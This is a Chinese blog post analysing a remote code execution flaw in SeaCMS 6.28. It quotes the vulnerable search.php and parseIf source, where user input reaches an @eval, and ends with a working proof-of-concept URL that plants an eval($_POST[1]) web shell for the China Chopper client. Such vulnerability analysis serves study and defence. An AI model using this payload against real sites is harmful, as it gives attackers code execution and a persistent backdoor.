海洋CMS 版本 6.28 代码执行漏洞,很早之前挖的,网上已经被曝了,发出来当学习把
漏洞文件:seacms/search.php
function echoSearchPage() { global $dsql,$cfg_iscache,$mainClassObj,$page,$t1,$cfg_search_time,$searchtype,$searchword,$tid,$year,$letter,$area,$yuyan,$state,$ver,$order,$jq,$money,$cfg_basehost; $order = !empty($order)?$order:time; if(intval($searchtype)==5) { $searchTemplatePath = "/templets/".$GLOBALS['cfg_df_style']."/".$GLOBALS['cfg_df_html']."/cascade.html"; $typeStr = !empty($tid)?intval($tid).'_':'0_'; $yearStr = !empty($year)?PinYin($year).'_':'0_'; $letterStr = !empty($letter)?$letter.'_':'0_'; $areaStr = !empty($area)?PinYin($area).'_':'0_'; $orderStr = !empty($order)?$order.'_':'0_'; $jqStr = !empty($jq)?$jq.'_':'0_'; $cacheName="parse_cascade_".$typeStr.$yearStr.$letterStr.$areaStr.$orderStr; $pSize = getPageSizeOnCache($searchTemplatePath,"cascade",""); }else { if($cfg_search_time&&$page==1) checkSearchTimes($cfg_search_time); $searchTemplatePath = "/templets/".$GLOBALS['cfg_df_style']."/".$GLOBALS['cfg_df_html']."/search.html"; $cacheName="parse_search_"; $pSize = getPageSizeOnCache($searchTemplatePath,"search",""); } if (empty($pSize)) $pSize=12; switch (intval($searchtype)) { case -1: $whereStr=" where v_recycled=0 and (v_name like '%$searchword%' or v_actor like '%$searchword%' or v_director like '%$searchword%' or v_publisharea like '%$searchword%' or v_publishyear like '%$searchword%' or v_letter='$searchword' or v_tags='$searchword' or v_nickname like '%$searchword%')"; break; case 0: $whereStr=" where v_recycled=0 and v_name like '%$searchword%'"; break; case 1: $whereStr=" where v_recycled=0 and v_actor like '%$searchword%'"; break; case 2: $whereStr=" where v_recycled=0 and v_publisharea like '%$searchword%'"; break; case 3: $whereStr=" where v_recycled=0 and v_publishyear like '%$searchword%'"; break; case 4: $whereStr=" where v_recycled=0 and v_letter='".strtoupper($searchword)."'"; break; case 5: $whereStr=" where v_recycled=0"; if(!empty($tid)) $whereStr.=" and (tid in (".getTypeId($tid).") or FIND_IN_SET('".$tid."',v_extratype)<>0)"; if($year=="more") { $publishyeartxt=sea_DATA."/admin/publishyear.txt"; $publishyear = array(); if(filesize($publishyeartxt)>0) { $publishyear = file($publishyeartxt); } $yearArray=$publishyear; $yeartxt= implode(',',$yearArray); $whereStr.=" and v_publishyear not in ($yeartxt)"; } if(!empty($year) AND $year!="more") {$whereStr.=" and v_publishyear='$year'";} if($letter=="0-9") {$whereStr.=" and v_letter in ('0','1','2','3','4','5','6','7','8','9')";} if(!empty($letter) AND $letter!="0-9") {$whereStr.=" and v_letter='$letter'";} if(!empty($area)) $whereStr.=" and v_publisharea='$area'"; if(!empty($yuyan)) $whereStr.=" and v_lang='$yuyan'"; if(!empty($jq)) $whereStr.=" and v_jq like'%$jq%'"; if($state=='l') $whereStr.=" and v_state !=0"; if($state=='w') $whereStr.=" and v_state=0"; if($money=='s') $whereStr.=" and v_money !=0"; if($money=='m') $whereStr.=" and v_money=0"; if(!empty($ver)) $whereStr.=" and v_ver='$ver'"; break; } $sql="select count(*) as dd from sea_data ".$whereStr; $row = $dsql->GetOne($sql); if(is_array($row)) { $TotalResult = $row['dd']; } else { $TotalResult = 0; } $pCount = ceil($TotalResult/$pSize); if($cfg_iscache){ if(chkFileCache($cacheName)){ $content = getFileCache($cacheName); }else{ $content = parseSearchPart($searchTemplatePath); setFileCache($cacheName,$content); } }else{ $content = parseSearchPart($searchTemplatePath); } $content = str_replace("{searchpage:page}",$page,$content); $content = str_replace("{seacms:searchword}",$searchword,$content); $content = str_replace("{seacms:searchnum}",$TotalResult,$content); $content = str_replace("{searchpage:ordername}",$order,$content); $content = str_replace("{searchpage:order-hit-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=hit&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content); $content = str_replace("{searchpage:order-hitasc-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=hitasc&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content); $content = str_replace("{searchpage:order-id-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=id&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content); $content = str_replace("{searchpage:order-idasc-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=idasc&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content); $content = str_replace("{searchpage:order-time-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=time&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content); $content = str_replace("{searchpage:order-timeasc-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=timeasc&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content); $content = str_replace("{searchpage:order-commend-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=commend&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content); $content = str_replace("{searchpage:order-commendasc-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=commendasc&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content); $content = str_replace("{searchpage:order-score-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=score&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content); $content = str_replace("{searchpage:order-scoreasc-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=scoreasc&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content); if(intval($searchtype)==5) { $tname = !empty($tid)?getTypeNameOnCache($tid):'全部'; $jq = !empty($jq)?$jq:'全部'; $area = !empty($area)?$area:'全部'; $year = !empty($year)?$year:'全部'; $yuyan = !empty($yuyan)?$yuyan:'全部'; $letter = !empty($letter)?$letter:'全部'; $state = !empty($state)?$state:'全部'; $ver = !empty($ver)?$ver:'全部'; $money = !empty($money)?$money:'全部'; $content = str_replace("{searchpage:type}",$tid,$content); $content = str_replace("{searchpage:typename}",$tname ,$content); $content = str_replace("{searchpage:year}",$year,$content); $content = str_replace("{searchpage:area}",$area,$content); $content = str_replace("{searchpage:letter}",$letter,$content); $content = str_replace("{searchpage:lang}",$yuyan,$content); $content = str_replace("{searchpage:jq}",$jq,$content); if($state=='w'){$state2="完结";}elseif($state=='l'){$state2="连载中";}else{$state2="全部";} if($money=='m'){$money2="免费";}elseif($money=='s'){$money2="收费";}else{$money2="全部";} $content = str_replace("{searchpage:state}",$state2,$content); $content = str_replace("{searchpage:money}",$money2,$content); $content = str_replace("{searchpage:ver}",$ver,$content); $content=$mainClassObj->parsePageList($content,"",$page,$pCount,$TotalResult,"cascade"); $content=$mainClassObj->parseSearchItemList($content,"type"); $content=$mainClassObj->parseSearchItemList($content,"year"); $content=$mainClassObj->parseSearchItemList($content,"area"); $content=$mainClassObj->parseSearchItemList($content,"letter"); $content=$mainClassObj->parseSearchItemList($content,"lang"); $content=$mainClassObj->parseSearchItemList($content,"jq"); $content=$mainClassObj->parseSearchItemList($content,"state"); $content=$mainClassObj->parseSearchItemList($content,"ver"); $content=$mainClassObj->parseSearchItemList($content,"money"); }else { $content=$mainClassObj->parsePageList($content,"",$page,$pCount,$TotalResult,"search"); } $content=replaceCurrentTypeId($content,-444); $content=$mainClassObj->parseIf($content); //这个函数引起的,我们来跟踪下这个函数 $content=str_replace("{seacms:member}",front_member(),$content); $searchPageStr = $content; echo str_replace("{seacms:runinfo}",getRunTime($t1),$searchPageStr) ; }
parseif函数路径:/include/main.class.php
function parseIf($content){ if (strpos($content,'{if:')=== false){ return $content; }else{ $labelRule = buildregx("{if:(.*?)}(.*?){end if}","is"); $labelRule2="{elseif"; $labelRule3="{else}"; preg_match_all($labelRule,$content,$iar); $arlen=count($iar[0]); $elseIfFlag=false; for($m=0;$m<$arlen;$m++){ $strIf=$iar[1][$m]; $strIf=$this->parseStrIf($strIf); $strThen=$iar[2][$m]; $strThen=$this->parseSubIf($strThen); if (strpos($strThen,$labelRule2)===false){ if (strpos($strThen,$labelRule3)>=0){ $elsearray=explode($labelRule3,$strThen); $strThen1=$elsearray[0]; $strElse1=$elsearray[1]; @eval("if(".$strIf."){/$ifFlag=true;}else{/$ifFlag=false;}"); if ($ifFlag){ $content=str_replace($iar[0][$m],$strThen1,$content);} else {$content=str_replace($iar[0][$m],$strElse1,$content);} }else{ @eval("if(".$strIf.") { /$ifFlag=true;} else{ /$ifFlag=false;}");//就是这里了,@eval if ($ifFlag) $content=str_replace($iar[0][$m],$strThen,$content); else $content=str_replace($iar[0][$m],"",$content);} }else{ $elseIfArray=explode($labelRule2,$strThen); $elseIfArrayLen=count($elseIfArray); $elseIfSubArray=explode($labelRule3,$elseIfArray[$elseIfArrayLen-1]); $resultStr=$elseIfSubArray[1]; $elseIfArraystr0=addslashes($elseIfArray[0]); @eval("if($strIf){/$resultStr=/"$elseIfArraystr0/";}"); for($elseIfLen=1;$elseIfLen<$elseIfArrayLen;$elseIfLen++){ $strElseIf=getSubStrByFromAndEnd($elseIfArray[$elseIfLen],":","}",""); $strElseIf=$this->parseStrIf($strElseIf); $strElseIfThen=addslashes(getSubStrByFromAndEnd($elseIfArray[$elseIfLen],"}","","start")); @eval("if(".$strElseIf."){/$resultStr=/"$strElseIfThen/";}"); @eval("if(".$strElseIf."){/$elseIfFlag=true;}else{/$elseIfFlag=false;}"); if ($elseIfFlag) {break;} } $strElseIf0=getSubStrByFromAndEnd($elseIfSubArray[0],":","}",""); $strElseIfThen0=addslashes(getSubStrByFromAndEnd($elseIfSubArray[0],"}","","start")); if(strpos($strElseIf0,'==')===false&&strpos($strElseIf0,'=')>0)$strElseIf0=str_replace('=', '==', $strElseIf0); @eval("if(".$strElseIf0."){/$resultStr=/"$strElseIfThen0/";/$elseIfFlag=true;}"); $content=str_replace($iar[0][$m],$resultStr,$content); } } return $content; }
POC:/search.php?searchtype=5&tid=&area=eval($_POST[1]) 菜刀链接,密码为1
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论